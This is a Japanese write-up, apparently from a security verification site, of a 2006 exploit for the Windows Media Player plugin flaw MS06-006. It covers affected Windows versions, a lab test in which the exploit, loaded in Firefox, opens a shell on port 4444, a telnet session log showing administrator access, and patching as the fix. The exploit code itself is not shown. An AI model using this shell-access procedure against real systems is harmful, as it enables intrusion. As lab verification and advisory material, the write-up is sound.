目次
MS06-006:Windows Media Player プラグインの脆弱性により、リモートでコードが実行される(w2k版)
更新履歴
- 2006/02/19 初版
- Author grin
概要
- Windows Media Player プラグインの脆弱性に対するExploit
- 任意のコードを実行可能
- 今回の検証ではターゲット上でシェルポートを tcp/4444 をオープンさせる
影響を受けるシステム
- Microsoft Windows 2000 Service Pack 4
- Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
- Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003 x64 Edition
影響を受けないシステム
- Microsoft Windows Server 2003 for Itanium-based Systems および Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
- Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE) および Microsoft Windows Millennium Edition (Me)
参考URL
Exploitの検証
検証環境
- Windows2000 Advanced Server SP4 日本語版
- Mozilla Firefox 1.5.0.1
- Windows Media Player 9.00.00.2980
検証結果
- 攻撃元IPアドレス: 192.168.0.3(OS WindowsXP)
- 攻撃先IPアドレス: 192.168.0.150 (PC名 victim)
- 攻撃先PC上でExploitコードをFireFoxに読み込ませ、シェルポートtcp/4444をオープンさせ攻撃元PCからtelnetで接続
telnet 192.168.0.150 4444
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Mozilla Firefox>whoami
whoami
TEST\Administrator
C:\Program Files\Mozilla Firefox>hostname
hostname
victim
C:\Program Files\Mozilla Firefox>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter ローカル エリア接続:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.150
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
対処方法
- MS06-006 パッチの適用 (Windows Update の実施)
